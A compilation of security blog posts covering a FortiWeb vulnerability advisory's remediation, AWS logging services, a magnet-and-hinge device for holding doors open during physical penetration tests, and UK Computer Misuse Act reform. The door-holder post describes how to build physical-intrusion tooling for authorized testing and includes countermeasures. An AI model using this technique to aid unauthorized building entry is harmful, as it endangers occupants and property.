An attacker can leverage this vulnerability to take complete control of the affected device, with the highest possible privileges. They might install a persistent shell, crypto mining software, or other malicious software. In the unlikely event the management interface is exposed to the internet, they could use the compromised platform to reach into the affected network beyond the DMZ. Note, though, that Rapid7 researchers were able to identify fewer than 300 of these devices that appear to expose their management interfaces to the general internet.

Note that while authentication is a prerequisite for this exploit, this vulnerability could be combined with another authentication bypass issue, such as CVE-2020-29015.

Remediation

In the absence of a patch, users are advised to disable the FortiWeb device’s management interface from untrusted networks, which would include the internet. Generally speaking, management interfaces for devices like FortiWeb should not be exposed directly to the internet anyway — instead, they should be reachable only via trusted, internal networks, or over a secure VPN connection.


[The Lost Bots] Episode 3: Stories From the SOC

Post Syndicated from Rapid7 original https://blog.rapid7.com/2021/08/16/the-lost-bots-episode-3-stories-from-the-soc/

[The Lost Bots] Episode 3: Stories From the SOC

Welcome back to The Lost Bots, a vlog series where Rapid7 Detection and Response Practice Advisor Jeffrey Gardner talks all things security with fellow industry experts. In this third episode, Jeffrey is joined by Stephen Davis, a Technical Lead and Customer Advisor on Rapid7’s Managed Detection and Response team. Stephen shares a story about a phishing attack on an organization, possibly by an advanced persistent threat (APT) — insert spooky “dun dun dun” sound effect — through a malicious Excel document. Watch below to hear about how our MDR team caught this attack, lessons learned, and tips for how teams can stay ahead of these types of threats in their environment.




Stay tuned for future episodes of The Lost Bots! Coming soon: Jeffrey tackles deception technology — what it is, how you can use it, and why it matters.

How US federal agencies can use AWS to improve logging and log retention

Post Syndicated from Derek Doerr original https://aws.amazon.com/blogs/security/how-us-federal-agencies-can-use-aws-to-improve-logging-and-log-retention/

This post is part of a series about how Amazon Web Services (AWS) can help your US federal agency meet the requirements of the President’s Executive Order on Improving the Nation’s Cybersecurity. You will learn how you can use AWS information security practices to help meet the requirement to improve logging and log retention practices in your AWS environment.

Improving the security and operational readiness of applications relies on improving the observability of the applications and the infrastructure on which they operate. For our customers, this translates to questions of how to gather the right telemetry data, how to securely store it over its lifecycle, and how to analyze the data in order to make it actionable. These questions take on more importance as our federal customers seek to improve their collection and management of log data in all their IT environments, including their AWS environments, as mandated by the executive order.

Given the interest in the technologies used to support logging and log retention, we’d like to share our perspective. This starts with an overview of logging concepts in AWS, including log storage and management, and then proceeds to how to gain actionable insights from that logging data. This post will address how to improve logging and log retention practices consistent with the Security and Operational Excellence pillars of the AWS Well-Architected Framework.

Log actions and activity within your AWS account

AWS provides you with extensive logging capabilities to provide visibility into actions and activity within your AWS account. A security best practice is to establish a wide range of detection mechanisms across all of your AWS accounts. Starting with services such as AWS CloudTrail, AWS Config, Amazon CloudWatch, Amazon GuardDuty, and AWS Security Hub provides a foundation upon which you can base detective controls, remediation actions, and forensics data to support incident response. Here is more detail on how these services can help you gain more security insights into your AWS workloads:

  • AWS CloudTrail provides event history for all of your AWS account activity, including API-level actions taken through the AWS Management Console, AWS SDKs, command line tools, and other AWS services. You can use CloudTrail to identify who or what took which action, what resources were acted upon, when the event occurred, and other details. If your agency uses AWS Organizations, you can automate this process for all of the accounts in the organization.
  • CloudTrail logs can be delivered from all of your accounts into a centralized account. This places all logs in a tightly controlled, central location, making them easier to protect, store, and analyze. As with AWS CloudTrail, you can automate this process for all of the accounts in the organization using AWS Organizations. CloudTrail can also be configured to emit metric data into the CloudWatch monitoring service, giving near-real-time insights into the usage of various services.
  • CloudTrail log file integrity validation produces and cryptographically signs a digest file that contains references and hashes for every CloudTrail file that was delivered in that hour. This makes it computationally infeasible to modify, delete, or forge CloudTrail log files without detection. Validated log files are invaluable in security and forensic investigations. For example, a validated log file enables you to assert positively that the log file itself has not changed, or that particular user credentials performed specific API activity.
  • AWS Config monitors and records your AWS resource configurations and allows you to automate the evaluation of recorded configurations against desired configurations. For example, you can use AWS Config to verify that resources are encrypted, multi-factor authentication (MFA) is enabled, and logging is turned on, and you can use AWS Config rules to identify noncompliant resources. Additionally, you can review changes in configurations and relationships between AWS resources and dive into detailed resource configuration histories, helping you to determine when compliance status changed and the reason for the change.
  • Amazon GuardDuty is a threat detection service that continuously monitors for malicious activity and unauthorized behavior to protect your AWS accounts and workloads. Amazon GuardDuty analyzes and processes the following data sources: VPC Flow Logs, AWS CloudTrail management event logs, CloudTrail Amazon Simple Storage Service (Amazon S3) data event logs, and DNS logs. It uses threat intelligence feeds, such as lists of malicious IP addresses and domains, and machine learning to identify potential threats within your AWS environment.
  • AWS Security Hub provides a single place that aggregates, organizes, and prioritizes your security alerts, or findings, from multiple AWS services and optional third-party products to give you a comprehensive view of security alerts and compliance status.
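To get a concrete feel for the “who did what” data CloudTrail captures, here is a small sketch that summarizes a synthetic, heavily trimmed CloudTrail event record (real events carry many more fields; the account ID and user are placeholders):

```python
import json

# A synthetic CloudTrail event; field names follow the documented
# CloudTrail record format, but the values are made up for illustration.
raw = """
{
  "eventTime": "2021-08-01T12:34:56Z",
  "eventName": "ConsoleLogin",
  "sourceIPAddress": "203.0.113.10",
  "userIdentity": {"type": "IAMUser",
                   "arn": "arn:aws:iam::111122223333:user/alice"}
}
"""

def who_did_what(record: dict) -> str:
    """Summarize one CloudTrail event: who, what, when, from where."""
    who = record.get("userIdentity", {}).get("arn", "unknown")
    return (f"{record['eventTime']} {who} called "
            f"{record['eventName']} from {record['sourceIPAddress']}")

event = json.loads(raw)
```

Here, `who_did_what(event)` yields `"2021-08-01T12:34:56Z arn:aws:iam::111122223333:user/alice called ConsoleLogin from 203.0.113.10"` — exactly the kind of attribution question CloudTrail exists to answer.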

You should be aware that most AWS services do not charge you for enabling logging (AWS WAF, for example), but storing the logs will incur ongoing costs. Always consult the AWS service’s pricing page to understand cost impacts. Related services, such as Amazon Kinesis Data Firehose (used to stream data to storage services) and Amazon Simple Storage Service (Amazon S3, used to store log data), will also incur charges.

Turn on service-specific logging as desired

After you have the foundational logging services enabled and configured, next turn your attention to service-specific logging. Many AWS services produce service-specific logs that include additional information. These services can be configured to record and send out information that is necessary to understand their internal state, including application, workload, user activity, dependency, and transaction telemetry. Here’s a sampling of key services with service-specific logging features:

  • Amazon CloudWatch provides you with data and actionable insights to monitor your applications, respond to system-wide performance changes, optimize resource utilization, and get a unified view of operational health. CloudWatch collects monitoring and operational data in the form of logs, metrics, and events, providing you with a unified view of AWS resources, applications, and services that run on AWS and on-premises servers. You can gain additional operational insights from your AWS compute instances (Amazon Elastic Compute Cloud, or EC2) as well as on-premises servers using the CloudWatch agent. Additionally, you can use CloudWatch to detect anomalous behavior in your environments, set alarms, visualize logs and metrics side by side, take automated actions, troubleshoot issues, and discover insights to keep your applications running smoothly.
  • Amazon CloudWatch Logs is a component of Amazon CloudWatch which you can use to monitor, store, and access your log files from Amazon Elastic Compute Cloud (Amazon EC2) instances, AWS CloudTrail, Route 53, and other sources. CloudWatch Logs enables you to centralize the logs from all of your systems, applications, and AWS services that you use, in a single, highly scalable service. You can then easily view them, search them for specific error codes or patterns, filter them based on specific fields, or archive them securely for future analysis. CloudWatch Logs enables you to see all of your logs, regardless of their source, as a single and consistent flow of events ordered by time, and you can query them and sort them based on other dimensions, group them by specific fields, create custom computations with a powerful query language, and visualize log data in dashboards.
  • Traffic Mirroring allows you to achieve full packet capture (as well as filtered subsets) of network traffic from an elastic network interface of EC2 instances inside your VPC. You can then send the captured traffic to out-of-band security and monitoring appliances for content inspection, threat monitoring, and troubleshooting.
  • The Elastic Load Balancing service provides access logs that capture detailed information about requests that are sent to your load balancer. Each log contains information such as the time the request was received, the client’s IP address, latencies, request paths, and server responses. The specific information logged varies by load balancer type.
  • Amazon S3 access logs record the S3 bucket and account that are being accessed, the API action, and requester information.
  • AWS Web Application Firewall (WAF) logs record web requests that are processed by AWS WAF, and indicate whether the requests matched AWS WAF rules and what actions, if any, were taken. These logs are delivered to Amazon S3 by using Amazon Kinesis Data Firehose.
  • Amazon Relational Database Service (Amazon RDS) log files can be downloaded or published to Amazon CloudWatch Logs. Log settings are specific to each database engine. Agencies use these settings to apply their desired logging configurations and choose which events are logged. Amazon Aurora and Amazon RDS for Oracle also support a real-time logging feature called “database activity streams,” which provides even more detail and cannot be accessed or modified by database administrators.
  • Amazon Route 53 provides options for logging for both public DNS query requests as well as Route 53 Resolver DNS queries:
    • Route 53 Resolver DNS query logs record DNS queries and responses that originate from your VPC, that use an inbound Resolver endpoint, that use an outbound Resolver endpoint, or that use a Route 53 Resolver DNS Firewall.
    • Route 53 DNS public query logs record queries to Route 53 for domains you have hosted with AWS, including the domain or subdomain that was requested; the date and time of the request; the DNS record type; the Route 53 edge location that responded to the DNS query; and the DNS response code.
  • Amazon Elastic Compute Cloud (Amazon EC2) instances can use the unified CloudWatch agent to collect logs and metrics from Linux, macOS, and Windows EC2 instances and publish them to the Amazon CloudWatch service.
  • Elastic Beanstalk logs can be streamed to CloudWatch Logs. You can also use the AWS Management Console to request the last 100 log entries from the web and application servers, or request a bundle of all log files that is uploaded to Amazon S3 as a ZIP file.
  • Amazon CloudFront logs record user requests for content that is cached by CloudFront.
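As one concrete example of the list above, the unified CloudWatch agent is driven by a JSON configuration file. A minimal sketch (the file path and log group name are illustrative placeholders) that ships a single log file to CloudWatch Logs might look like:

```python
import json

# Minimal unified CloudWatch agent config: ship one log file to a log
# group. The file path and group name below are placeholders.
agent_config = {
    "logs": {
        "logs_collected": {
            "files": {
                "collect_list": [
                    {
                        "file_path": "/var/log/messages",
                        "log_group_name": "ec2/var/log/messages",
                        # {instance_id} is substituted by the agent itself.
                        "log_stream_name": "{instance_id}",
                    }
                ]
            }
        }
    }
}

config_json = json.dumps(agent_config, indent=2)
```

The agent typically reads this configuration from a file on the instance (or from SSM Parameter Store); production configurations usually add a `metrics` section alongside `logs`.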

Store and analyze log data

Now that you’ve enabled foundational and service-specific logging in your AWS accounts, that data needs to be persisted and managed throughout its lifecycle. AWS offers a variety of solutions and services to consolidate your log data and store it, secure access to it, and perform analytics.

Store log data

The primary service for storing all of this logging data is Amazon S3. Amazon S3 is ideal for this role, because it’s a highly scalable, highly resilient object storage service. AWS provides a rich set of multi-layered capabilities to secure log data that is stored in Amazon S3, including encrypting objects (log records), preventing deletion (the S3 Object Lock feature), and using lifecycle policies to transition data to lower-cost storage over time (for example, to S3 Glacier). Access to data in Amazon S3 can also be restricted through AWS Identity and Access Management (IAM) policies, AWS Organizations service control policies (SCPs), S3 bucket policies, Amazon S3 Access Points, and AWS PrivateLink interfaces. While S3 is particularly easy to use with other AWS services given its various integrations, many customers also centralize their storage and analysis of their on-premises log data, or log data from other cloud environments, on AWS using S3 and the analytic features described below.
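The tiering described above is expressed as an S3 lifecycle configuration. Here is a sketch — the prefix and day counts are illustrative placeholders, not a compliance recommendation — of a rule that moves log objects to Glacier and eventually expires them:

```python
# The shape follows the S3 PutBucketLifecycleConfiguration API; the
# prefix and retention periods below are illustrative only.
lifecycle_config = {
    "Rules": [
        {
            "ID": "archive-then-expire-logs",
            "Status": "Enabled",
            "Filter": {"Prefix": "cloudtrail/"},
            # Move log objects to lower-cost Glacier storage after 90 days...
            "Transitions": [{"Days": 90, "StorageClass": "GLACIER"}],
            # ...and delete them after roughly seven years.
            "Expiration": {"Days": 2557},
        }
    ]
}
```

Applied with boto3, this would be passed as `s3.put_bucket_lifecycle_configuration(Bucket="your-log-bucket", LifecycleConfiguration=lifecycle_config)`.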

If your AWS accounts are organized in a multi-account architecture, you can make use of the AWS Centralized Logging solution. This solution enables organizations to collect, analyze, and display CloudWatch Logs data in a single dashboard. AWS services generate log data, such as audit logs for access, configuration changes, and billing events. In addition, web servers, applications, and operating systems all generate log files in various formats. This solution uses the Amazon Elasticsearch Service (Amazon ES) and Kibana to deploy a centralized logging solution that provides a unified view of all the log events. In combination with other AWS-managed services, this solution provides you with a turnkey environment to begin logging and analyzing your AWS environment and applications.

You can also make use of services such as Amazon Kinesis Data Firehose, which you can use to transport log information to S3, Amazon ES, or any third-party service that is provided with an HTTP endpoint, such as Datadog, New Relic, or Splunk.

Finally, you can use Amazon EventBridge to route and integrate event data between AWS services and to third-party solutions such as software as a service (SaaS) providers or help desk ticketing systems. EventBridge is a serverless event bus service that allows you to connect your applications with data from a variety of sources. EventBridge delivers a stream of real-time data from your own applications, SaaS applications, and AWS services, and then routes that data to targets such as AWS Lambda.
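EventBridge routing is driven by event patterns. As a sketch, the pattern below matches GuardDuty findings so they can be routed to a target such as a Lambda function; the `matches` helper is a deliberately tiny approximation of EventBridge’s matching for demonstration (the real matching language is much richer):

```python
# Matches events that GuardDuty publishes to the default event bus.
guardduty_pattern = {
    "source": ["aws.guardduty"],
    "detail-type": ["GuardDuty Finding"],
}

def matches(pattern: dict, event: dict) -> bool:
    """Tiny subset of EventBridge matching: every pattern key must list
    the event's value. Real patterns also support nesting, prefixes, etc."""
    return all(event.get(key) in allowed for key, allowed in pattern.items())

sample = {"source": "aws.guardduty",
          "detail-type": "GuardDuty Finding",
          "detail": {"severity": 8}}
```

Here `matches(guardduty_pattern, sample)` is `True`, while an unrelated event (say, from `aws.ec2`) would not match and would not be delivered to the rule’s targets.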

Analyze log data and respond to incidents

As the final step in managing your log data, you can use AWS services such as Amazon Detective, Amazon ES, CloudWatch Logs Insights, and Amazon Athena to analyze your log data and gain operational insights.

  • Amazon Detective makes it easy to analyze, investigate, and quickly identify the root cause of security findings or suspicious activities. Detective automatically collects log data from your AWS resources. It then uses machine learning, statistical analysis, and graph theory to help you visualize and conduct faster and more efficient security investigations.
  • Incident Manager is a component of AWS Systems Manager which enables you to automatically take action when a critical issue is detected by an Amazon CloudWatch alarm or Amazon EventBridge event. Incident Manager executes pre-configured response plans to engage responders via SMS and phone calls, enable chat commands and notifications using AWS Chatbot, and execute AWS Systems Manager Automation runbooks. The Incident Manager console integrates with AWS Systems Manager OpsCenter to help you track incidents and post-incident action items from a central place that also synchronizes with popular third-party incident management tools such as Jira Service Desk and ServiceNow.
  • Amazon Elasticsearch Service (Amazon ES) is a fully managed service that collects, indexes, and unifies logs and metrics across your environment to give you unprecedented visibility into your applications and infrastructure. With Amazon ES, you get the scalability, flexibility, and security you need for the most demanding log analytics workloads. You can configure a CloudWatch Logs log group to stream data it receives to your Amazon ES cluster in near real time through a CloudWatch Logs subscription.
  • CloudWatch Logs Insights enables you to interactively search and analyze your log data in CloudWatch Logs.
  • Amazon Athena is an interactive query service that you can use to analyze data in Amazon S3 by using standard SQL. Athena is serverless, so there is no infrastructure to manage, and you pay only for the queries that you run.
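For example, once CloudTrail logs in S3 have been mapped to an Athena table (the table name below is a placeholder; column names follow the CloudTrail record format as exposed by the standard CloudTrail/Athena integration), a query surfacing the noisiest sources of access-denied errors might look like:

```python
# Hypothetical table name; adjust to your CloudTrail/Athena setup.
ACCESS_DENIED_QUERY = """
SELECT useridentity.arn AS principal,
       eventname,
       count(*) AS denied_calls
FROM cloudtrail_logs
WHERE errorcode = 'AccessDenied'
  AND eventtime > '2021-08-01'
GROUP BY useridentity.arn, eventname
ORDER BY denied_calls DESC
LIMIT 20
""".strip()
```

Because Athena is serverless, this runs directly against the log data in S3, whether submitted from the console or via boto3’s `start_query_execution`.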

Conclusion

As called out in the executive order, information from network and systems logs is invaluable for both investigation and remediation services. AWS provides a broad set of services to collect an unprecedented amount of data at very low cost, optionally store it for long periods of time in tiered storage, and analyze that telemetry information from your cloud-based workloads. These insights will help you improve your organization’s security posture and operational readiness and, as a result, improve your organization’s ability to deliver on its mission.

Next steps

To learn more about how AWS can help you meet the requirements of the executive order, see the other posts in this series.

If you have feedback about this post, submit comments in the Comments section below.

Want more AWS Security how-to content, news, and feature announcements? Follow us on Twitter.

Author

Derek Doerr

Derek is a Senior Solutions Architect with the Public Sector team at AWS. He has been working with AWS technology for over four years. Specializing in enterprise management and governance, he is passionate about helping AWS customers navigate their journeys to the cloud. In his free time, he enjoys time with family and friends, as well as scuba diving.

When One Door Opens, Keep It Open: A New Tool for Physical Security Testing

Post Syndicated from Ted Raffle original https://blog.rapid7.com/2021/08/13/when-one-door-opens-keep-it-open-a-new-tool-for-physical-security-testing/

When One Door Opens, Keep It Open: A New Tool for Physical Security Testing

As penetration testers, we spend most of our time working with different types of networks, applications, and hardware devices. Physical security is another fun area we get to work in during physical social engineering penetration tests and red team engagements, which sometimes include attempts to gain entry into facilities or sensitive areas within them.

Just like when we’re testing a virtual network’s defenses against intruders, pentesters need to put themselves in the mindset of attackers when testing physical security — and that means thinking creatively.

One classic method of gaining physical access is “tailgating,” where you wait for someone else to be going into or coming out of where you want to go, so you can follow them in before a door closes. To help pentesters simulate an attacker who can tailgate without suspiciously hovering around the door, we’ve come up with a neat little device to help with outward-opening doors with ferromagnetic metal frames, like steel entry doors. This tool is one more way pentesters can recreate the thought process of attackers — and help organizations outsmart them.

But first, of course, we want to caution that this is something that should only be used for legitimate purposes, when you have authorization or authority to do so. While we encourage other testers to try this out themselves and use it for customer engagements, this device is patent pending, and we request that you not manufacture, sell, or monetize it.

It’s it! What is it?

We start by placing our little door holder on the door frame, on the side of the door that opens:


When someone opens the door, it will push the long leaf of the hinge forward:


As the door opens further than the long leaf of the hinge, it falls back down behind the door:


And while the person who was exiting the door is hopefully on their merry way and not looking back to see if the door will close behind them, our little device will make sure it doesn’t:


More than one way to peel an orange

We’ve made a few versions of this using lock hasps. Another common hinge with a longer side would be your standard t-hinge. This one was made with a few bar-style neodymium magnets:


We’ve also made a miniature version using cup-style neodymium magnets:


Important tips

Neodymium magnets can slide around a good bit on smooth surfaces. Putting some grippy tape on the back of the magnet can help keep it from sliding around or scratching paint. Electrical tape and gorilla tape have worked well.


Likewise, having some padding on the leaf that contacts the door is important to prevent it from scratching paint.


Countermeasures

This tool makes it easier to enter a building or secure area by tailgating. By simulating an attacker with a high level of skill and ingenuity, the tool can help reveal weaknesses in organizations’ physical security protocols — and what countermeasures might be more effective.

If you have an electronic access control system, consider configuring it to trigger alerts if a door has been left open for too long. But the best place to start is to make sure your physical security policies and security awareness training educates staff about tailgating, encourages them not to let someone follow them in, and emphasizes making sure that doors close behind them.
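The "door held open too long" alert suggested above reduces to a simple timer over door-state events. Here is a minimal sketch; the 30-second threshold and the event format are assumptions, not taken from any particular access control product:

```python
from dataclasses import dataclass
from typing import Optional

@dataclass
class DoorMonitor:
    """Tracks one door's open/closed readings and flags it when held open too long."""
    threshold_seconds: float = 30.0
    _opened_at: Optional[float] = None
    _alerted: bool = False

    def on_event(self, timestamp: float, is_open: bool) -> bool:
        """Feed a (timestamp, state) reading; returns True once per held-open incident."""
        if not is_open:
            # Door closed: reset so the next incident can alert again.
            self._opened_at = None
            self._alerted = False
            return False
        if self._opened_at is None:
            self._opened_at = timestamp
        if not self._alerted and timestamp - self._opened_at >= self.threshold_seconds:
            self._alerted = True
            return True
        return False
```

For example, readings at t=0 (open) and t=31 (still open) trigger a single alert at t=31, and closing the door re-arms the monitor for the next incident.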

NEVER MISS A BLOG

Get the latest stories, expertise, and news about security today.

Reforming the UK’s Computer Misuse Act

Post Syndicated from Jen Ellis original https://blog.rapid7.com/2021/08/12/reforming-the-uks-computer-misuse-act/

Reforming the UK’s Computer Misuse Act

The UK Home Office recently ran a Call for Information to investigate the Computer Misuse Act 1990 (CMA). The CMA is the UK’s anti-hacking law, and as Rapid7 is active in the UK and highly engaged in public policy efforts to advance security, we provided feedback on the issues we see with the legislation.

We have some concerns with the CMA in its current form, as well as recommendations for how to address them. Additionally, because Rapid7 has addressed similar issues relating to U.S. laws — particularly as relates to the U.S. equivalent of the CMA, the Computer Fraud and Abuse Act (CFAA) — for each section below, we’ve included a short comparison with U.S. law for those who are interested.

Restrictions on security testing tools and proof-of-concept code

One of the most concerning issues with the CMA is that it imperils dual-use open-source security testing tools and the sharing of proof-of-concept code.

Section 3A(2) of the CMA states:

(2) A person is guilty of an offence if he supplies or offers to supply any article believing that it is likely to be used to commit, or to assist in the commission of, an offence under section 1, 3 or 3ZA.

Security professionals rely on open-source and other widely available security testing tools that let them emulate the activity of attackers, and proof-of-concept exploit code helps organizations test whether their assets are vulnerable. These highly valued parts of robust security testing enable organizations to build defenses and understand the impacts of attacks.

Making these products open source helps keep them up-to-date with the latest attacker methodologies and ensures a broad range of organizations (not just well-resourced organizations) have access to tools to defend themselves. However, because they’re open source and widely available, these defensive tools could still be used by malicious actors for nefarious purposes.

The same issue applies to proof-of-concept exploit code. While the intent of the development and sharing of the code is defensive, there’s always a risk that malicious actors could access exploit code. But this makes the wide availability of testing tools all the more important, so organizations can identify and mitigate their exposure.

Rapid7’s recommendation

Interestingly, this is not an unknown issue — the Crown Prosecution Service (CPS) acknowledges it on their website. We’ve drawn from their guidance, as well as their Fraud Act guidelines, in drafting our recommended response, proposing that the Home Office consider modifying section 3A(2) of the CMA to exempt “articles” that are:

  • Capable of being used for legitimate purposes; and
  • Intended by the creator or supplier of the article to be used for a legitimate purpose; and
  • Widely available; unless
  • The article is deliberately developed or supplied for the sole purpose of committing a CMA offense.

If you’re concerned about creating a loophole in the law that can be exploited by malicious actors, rest assured the CMA would still retain 3A(1) as a means to prosecute those who supply articles with intent to commit CMA offenses.

Comparison with the CFAA

This issue doesn’t arise in the CFAA; however, the U.S. is subject to various export control rules that also restrict the sharing of dual-use security testing tools and proof-of-concept code.

Chilling security research

This is a topic Rapid7 has commented on many times in reference to the CFAA and the Digital Millennium Copyright Act, which is the U.S. equivalent of the UK’s Copyright, Designs and Patents Act 1988.

Independent security research aims to reveal vulnerabilities in technical systems so organizations can deploy better defenses and mitigations. This offers a significant benefit to society, but the CMA makes no provision for legitimate, good-faith testing. While Section 1(1) acknowledges that you must have intent to access the computer without authorization, it doesn’t mention that the motive to do so must be malicious, only that the actor intended to gain access without authorization. The CMA states:

(1) A person is guilty of an offence if—

a) he causes a computer to perform any function with intent to secure access to any program or data held in any computer, or to enable any such access to be secured;

b) the access he intends to secure, or to enable to be secured, is unauthorised; and

c) he knows at the time when he causes the computer to perform the function that that is the case.

Many types of independent security research, including port scanning and vulnerability investigations, could meet that description. As frequently noted in the context of the CFAA, it’s often not clear what qualifies as authorization to access assets connected to the internet, and independent security researchers often aren’t given explicit authorization to access a system.
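To make the ambiguity concrete: the port scanning mentioned above can be as little as attempting a TCP connection and noting whether it succeeds, as in this minimal sketch (run it only against systems you are authorized to test):

```python
import socket

def scan_port(host: str, port: int, timeout: float = 0.5) -> bool:
    """Return True if host:port accepts a TCP connection (i.e., the port is open)."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        # Connection refused, timed out, or otherwise unreachable.
        return False
```

Each call "causes a computer to perform a function," yet the same handshake is routine behavior for browsers, monitoring tools, and researchers alike, which is exactly why the CMA's silence on what constitutes authorization creates uncertainty.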

It’s worth noting that neither the National Crime Agency (NCA) nor the CPS seems to be recklessly pursuing frivolous investigations or prosecutions of good-faith security research. Nonetheless, the current legal language does expose researchers to legal risk and uncertainty, and it would be good to see some clarity on the topic.

Rapid7’s recommendation

Creating effective legal protections for good-faith, legitimate security research is challenging. We must avoid inadvertently creating a backdoor in the law that provides a defense for malicious actors or permits activities that can create unintended harm. As legislators consider options on this, we strongly recommend considering the following questions:

  • How do you determine whether research is legitimate and justified? Some considerations include whether sensitive information was accessed, and if so, how much – is there a threshold for what might be acceptable? Was any damage or disruption caused by the action? Did the researcher demand financial compensation from the technology manufacturer or operator?

For example, in our work on the CFAA, Rapid7 has proposed the following legal language to indicate what is understood by “good-faith security research.”

The term “good faith security research” means good faith testing or investigation to detect one or more security flaws or vulnerabilities in software, hardware, or firmware of a protected computer for the purpose of promoting the security or safety of the software, hardware, or firmware.

(A) The person carrying out such activity shall

(i) carry out such activity in a manner reasonably designed to minimize and avoid unnecessary damage or loss to property or persons;

(ii)  take reasonable steps, with regard to any information obtained without authorization, to minimize the information the person obtains, retains, and discloses to only that information which the person reasonably believes is directly necessary to test, investigate, or mitigate a security flaw or vulnerability;

(iii) take reasonable steps to disclose any security vulnerability derived from such activity to the owner of the protected computer or the Cybersecurity and Infrastructure Security Agency prior to disclosure to any other party

(iv) wait a reasonable amount of time before publicly disclosing any security flaw or vulnerability derived from such activity, taking into consideration the following:

(I) the severity of the vulnerability,

(II) the difficulty of mitigating the vulnerability,

(III) industry best practices, and

(IV) the willingness and ability of the owner of the protected computer to mitigate the vulnerability;

(v) not publicly disclose information obtained without authorization that is

(I) a trade secret without the permission of the owner of the trade secret; or

(II) the personally identifiable information of another individual, without the permission of that individual; and

(vi) does not use a nonpublic security flaw or vulnerability derived from such activity for any primarily commercial purpose prior to disclosing the flaw or vulnerability to the owner of the protected computer or the [government vulnerability coordination body].

(B) For purposes of subsection (A), it is not a public disclosure to disclose a vulnerability or other information derived from good faith security research to the [government vulnerability coordination body].

  • What happens if a researcher does not find anything to report? Some proposals for reforming the CMA have suggested requiring coordinated disclosure as a predicate for a research carve-out. This only works if the researcher actually finds something worth reporting. What happens if they do not? Is the research then not defensible?
  • Are we balancing the rights and safety of others with the need for security? For example, easing restrictions for threat intel investigators and security researchers may create a misalignment with existing privacy legislation. This may require balancing controls to protect the rights and safety of others.

The line between legitimate research and hack back

In discussions on CMA reform, we often hear the chilling effect on security research being lumped in with arguments for expanding authorities for threat intelligence gathering and operations. The latter sound alarmingly like requests for private-sector hack back (despite assertions otherwise). We believe it is critical that policymakers understand the distinction between acknowledging the importance of good-faith security research on the one hand and authorizing private-sector hack back on the other.

We understand private-sector hack back to mean an organization taking intrusive action against a cyber-attacker on technical assets or systems not owned or leased by the entity taking action or their client. While threat intel campaigners may disclaim hack back, in asking for authorization to take intrusive action on third-party systems — whether to better understand attacks, disrupt them, or even recapture lost data — they’re certainly satisfying the description of hack back and raising a number of concerns.

Rapid7 is strongly opposed to private-sector hack back. While we view both independent, good-faith security research and threat intelligence investigations as critical for security, we believe the two categories of activity need separate and distinct legal restrictions.

Good-faith security research is typically performed independently of manufacturers and operators in order to identify flaws or exposures in systems that provide opportunities for attackers. The goal is to remediate or mitigate these issues so that we reduce opportunities for attackers and decrease the risk for technology users. These activities often need to be undertaken without authorization to avoid blowback from manufacturers or operators that prioritize their reputation or profit above the security of their customers.

This activity is about protecting the safety and privacy of the many, and while researchers may take actions without authorization, they only do so on the technology of those ultimately responsible for both creating and mitigating the exposure. Without becoming aware of the issue, the technology provider and their users would continue to be exposed to risk.

In contrast, threat intel activities that involve interrogating or interacting with third-party assets prioritize the interests of a specific entity over those of other potential victims, whose compromised assets may have been leveraged in the attack. While threat intelligence can be very valuable in helping us understand how attackers behave — which can help others identify or prepare for attacks — data gathering and operations should be limited to assessing threats to assets that are owned or operated by the authorizing entity, or to non-invasive activities such as port scanning. More invasive activities can result in unintended consequences, including escalation of aggression, disruption or destruction for innocent third parties, and a quagmire of legal liability.

Because cyber attacks are criminal activity, if more investigation is needed, it should be undertaken with appropriate law enforcement involvement and oversight. We see no practical way to provide appropriate oversight or standards for the private sector to engage in this kind of activity.

Comparison to the CFAA

This issue also arises in the CFAA. In fact, it’s exacerbated by the CFAA enabling private entities to pursue civil causes of action, which means technology manufacturers and operators can seek to apply the CFAA in private cases against researchers. This is often done to protect corporate reputations, likely at the expense of technology users who are being exposed to risk. These private civil actions chill security research and account for the vast majority of CFAA cases and lawsuit threats focused on research. One of Rapid7’s recommendations to the UK Home Office was that the CMA should not be updated to include civil liability.

Washington State has helped protect good-faith security research in its Cybercrime Act (Chapter 9A.90 RCW), which both addresses the issue of defining authorization and exempts white-hat security research.

It’s also worth noting that the U.S. has an exemption for security research in Section 1201 of the Digital Millennium Copyright Act (DMCA). It would be good to see the UK government consider something similar for the Copyright, Designs and Patents Act 1988.

Clarifying authorization

At its core, the CMA effectively operates as a law prohibiting digital trespass and hinges on the concept of authorization. Four of the five classes of offenses laid out in the CMA involve “unauthorized” activities:

1. Unauthorised access to computer material.

2. Unauthorised access with intent to commit or facilitate commission of further offences.

3. Unauthorised acts with intent to impair, or with recklessness as to impairing, operation of computer, etc.

3ZA. Unauthorised acts causing, or creating risk of, serious damage.

Unfortunately, the CMA does not define authorization (or the lack thereof), nor detail what authorization should look like. As a result, it can be hard to know with certainty where the legal line is truly being drawn in the context of the internet, where many users don’t read or understand lengthy terms of service, and data and services are often publicly accessible for a wide variety of novel uses.

Many people take the view that if something is accessible in public spaces on the internet, authorization to access it is inherently granted. In this view, the responsibility lies with the owner or operator to ensure that if they don’t want to grant access to something, they don’t make it publicly available.

That being the case, the question becomes how systems owners and operators can indicate a lack of authorization for accessing systems or information in a way that scales, while still enabling broad access and innovative use of online services. In the physical world, we have an expectation that both public and private spaces exist. If a space is private and the owners don’t want others to access it, they can indicate this through signage or physical barriers (walls, fences, or gates). Currently, there is no accepted, standard way for owners and operators to set out a “No Trespassing” sign for publicly accessible data or systems on the internet that truly serves the intended purpose.

Rapid7’s recommendation

While a website’s Terms of Service (TOS) can be legally enforceable in some contexts, in our opinion the Home Office should not take the position that violations of TOS alone qualify as “unauthorized acts.” TOS are almost always ignored by the vast majority of internet users, and ordinary internet behavior may routinely violate TOS (such as using a pseudonym where a real name is required).

Reading TOS also does not scale for internet-wide scanning, as in the case of automated port scanning and other services that analyze the status of millions of publicly accessible websites and online assets. In addition, if TOS is “authorization” for the purposes of the CMA, it gives the author of the TOS the power to define what is and isn’t a hacking crime under CMA section 1.

To address this lack of clarity, the CMA needs a clearer explanation of what constitutes authorization for accessing technical systems or information through the internet and other forms of connected communications.

Comparison with the CFAA

This issue absolutely exists with the CFAA and is at the core of many of the criticisms of the law. Multiple U.S. cases have rejected the notion that TOS violations alone qualify as “exceeding authorization” under the CFAA, creating a split in the courts. The U.S. Supreme Court’s recent decision in Van Buren v. United States confirmed that TOS is an insufficient standard, noting that if TOS violations alone qualify as unauthorized acts for computer crime purposes, “then millions of otherwise law-abiding citizens are criminals.”

Next steps

